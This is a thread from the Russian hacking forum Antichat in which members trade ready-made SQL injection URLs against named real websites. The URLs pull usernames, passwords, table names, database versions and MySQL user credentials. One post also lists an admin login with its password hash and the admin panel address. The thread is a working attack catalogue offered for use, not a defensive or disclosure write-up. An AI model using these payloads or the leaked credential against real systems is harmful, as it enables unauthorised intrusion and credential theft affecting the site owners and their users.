HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Скуль(правда не смог найти имя таблицы)
  #1  
Старый 19.10.2006, 18:25
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
С нами: 10299862

Репутация: 17
По умолчанию Скуль(правда не смог найти имя таблицы)

http://www.multidmedia.com/news/news.php?id=-63%20union%20select%201,2,3,4,5/*
 
Ответить с цитированием

  #2  
Старый 20.10.2006, 09:58
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

loccitane.com Все движки разные но все бажные так держать админы.

_http://www.loccitane.com.au/product/categoryList.asp?mainUsageName=FRAGRANCE&subUsageI d=10%20or%201=@@version--

_http://www.loccitane.ru/category.php?id=-1+union+select+1,2,concat(login,char(58),password) ,1,5+from+users+where+id=134/*
 
Ответить с цитированием

  #3  
Старый 20.10.2006, 16:54
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

27 столбцов=)
Цитата:
_http://www.standardtvandappliance.com/home/products_detail/index.php?prodid=1327%20union%20select%201,2,3,4,u ser(),6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19 ,20,21,22,23,24,25,26,27/*
А вот еще одна на этом же сайте)
Цитата:
http://www.standardtvandappliance.com/home/subcategory/index.php?subcatid=63%20union%20select%201,USER(), 3,4,5,6,7/*
ВОТ еще 2 инекции на сайте

www.zot.ru

Цитата:
http://www.zot.ru/index.php?prodid=1+and+1=8%20union%20select%201,na me,3,4,id,6,7,art,9%20from%20cat/*
и
http://www.zot.ru/action.php?id=1+and+1=1+union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13+from+cat/*

все колонки которые мне известны и всем доступны:
id,name,art,typename,descr,acti,cert,spec,status

Последний раз редактировалось m0nzt3r; 20.10.2006 в 18:41..
 
Ответить с цитированием

  #4  
Старый 11.03.2007, 12:09
mal4Ik
Banned
Регистрация: 12.02.2007
Сообщений: 19
С нами: 10128291

Репутация: 11
По умолчанию

модный в своих кругах питерский сайт:

http://www.spbclub.ru/cgi-bin/content/show.php?dep=reviews&review=49+union+SELECT+null,n ull,password,null,null,null,null+FROM+users
 
Ответить с цитированием

  #5  
Старый 11.03.2007, 12:21
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

PHP код:
http://www.myminsk.com/catalog/counters.php?id=-1+union+select+1,2,table_name,4+from+INFORMATION_SCHEMA.TABLES+limit+0,1/* 
Цитата:
http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+u sers/*

http://www.stencilrevolution.com/tutorials/tutorialsview.php?id=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+p hpbb_users/*
PHP код:
http://dicom.spb.ru/tech/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* 
PHP код:
http://www.phpbuddy.com/article.php?id=-1+union+select+version(),2,user(),4,5,6/* 
PHP код:
http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* 

Последний раз редактировалось Colkru; 11.03.2007 в 14:27..
 
Ответить с цитированием

  #6  
Старый 11.03.2007, 13:41
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от Colkru  
PHP код:
http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+user/* 
это что типа таблицу подобрал?
 
Ответить с цитированием

  #7  
Старый 11.03.2007, 14:35
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
это что типа таблицу подобрал?
Опечатка... Когда нажимал контр+с, контр+в.. Я тут не подобрал таблицу, там пишит хостер что запрос отвергнут.

Скуля:

Цитата:
http://www.michaelyon-online.com/flf/emailit.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password), 6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+li mit+0,1/*

Последний раз редактировалось Colkru; 11.03.2007 в 15:09..
 
Ответить с цитированием

  #8  
Старый 21.10.2006, 01:21
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

[daily.com.ua]


Код:
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,login+from+users/*
http://daily.com.ua/admin/index.php - админка
andrew:b9e464f282d8051b47e0e592c6f58aa2

[www.pharm-system.com]


Код:
http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,6,7,8+from+users/*
[www.khabibullin.kiev.ua]

Код:
http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+1,2/*

[www.jimdunlop.com]
(смотреть исходник)

Код:
http://www.jimdunlop.com/index.php?page=products/pip&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

[www.amtel.ru]

Код:
http://www.amtel.ru/page.php?id=-1+union+select+1,2,3/*
[www.hillelisrael.org.il]
Код:
http://www.hillelisrael.org.il/page.php?table=Page&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #9  
Старый 22.10.2006, 02:16
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию

PHP код:
http://www.rabidhardware.net/index.php?id=1'%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20/* 
 
Ответить с цитированием

  #10  
Старый 22.10.2006, 22:29
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию

http://best4her.net/shop.php?cat=-3%20union%20select%201,2,3,4,5,6,7,8,9,10,11/*&retail - online shop

http://dendro.ru/?id=-4%20union%20select%201,2,3,4,5/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.